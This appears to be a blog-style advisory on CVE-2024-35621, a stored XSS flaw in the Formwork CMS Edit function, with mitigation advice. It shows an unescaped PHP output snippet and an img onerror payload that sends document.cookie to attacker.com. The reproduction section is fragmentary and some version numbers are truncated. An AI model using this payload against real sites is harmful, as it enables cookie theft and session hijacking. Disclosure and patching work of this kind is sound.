CVE-2024-35621 - Exploiting XSS in Formwork Edit Function (Before 1.13.)

CVE-2024-35621 is a critical cross-site scripting (XSS) vulnerability that affects the Edit function in Formwork versions before 1.13.. By leveraging this flaw, attackers can inject and execute arbitrary JavaScript or HTML code in the context of a victim’s browser, leading to data theft, session hijacking, or more damaging attacks.

Below, we’ll break down the details of the vulnerability, show you how it works with example payloads, and reference trustworthy sources for further reading.

What Is Formwork?

Formwork is a simple, file-based, extensible CMS built with PHP. It’s popular for small websites due to its user-friendly UI and flat-file structure.

What’s CVE-2024-35621 About?

A cross-site scripting vulnerability exists in the CMS’s Edit function. This means attackers can insert malicious scripts into the Content field of pages or posts. When a user (like an admin) views the infected page, the script executes inside their browser—potentially giving the attacker access to sensitive information.

Why Does This Happen?

This XSS is a classic case of insufficient input sanitization. The application fails to properly clean user-supplied content before rendering it back to the browser.

While the exact code varies, the vulnerability typically looks like this in PHP apps

<!-- Vulnerable code snippet when rendering page content -->
<div class="content">
    <?= $page->content() // No escaping here! ?>
</div>

By not escaping output, any HTML or JavaScript saved in $page->content() is rendered *as is*.

Step 1: Craft the Payload

An attacker would edit a page, post, or any section that uses the Edit function and inject something like:

<script>alert('XSS from CVE-2024-35621')</script>

or a stealthier payload

<img src=x onerror="fetch('https://attacker.com/log?cookie='+document.cookie)">

Step 2: Save Content

Save the content and make sure the page gets published.

Step 3: Victim Visits the Page

Anyone who views the compromised page will trigger the attacker’s script. For example, the document.cookie is sent to an external server, exposing sensitive site cookies.

Install Formwork <1.13.

- Download from GitHub releases

Log in as Admin

3. Create/Edit a Page

`html

Mitigation

Upgrade to Formwork 1.13. or newer immediately!

The latest version changelog says

> “Fixed possible cross-site scripting vulnerability in content field.”

If you can’t update, make sure your templates ALWAYS escape content

<!-- Safe output using htmlspecialchars() -->
<div class="content">
    <?= htmlspecialchars($page->content(), ENT_QUOTES, 'UTF-8') ?>
</div>

References

- Official CVE Entry
- Formwork Release 1.13.
- Formwork GitHub
- OWASP XSS Cheat Sheet

Conclusion

CVE-2024-35621 is a classic and dangerous XSS flaw. If you run a Formwork site, patch ASAP and check for malicious input in your content fields. Always validate and sanitize user input, and never trust data from users, even admins.

Timeline

Published on: 05/28/2024 16:15:16 UTC
Last modified on: 03/28/2025 20:15:23 UTC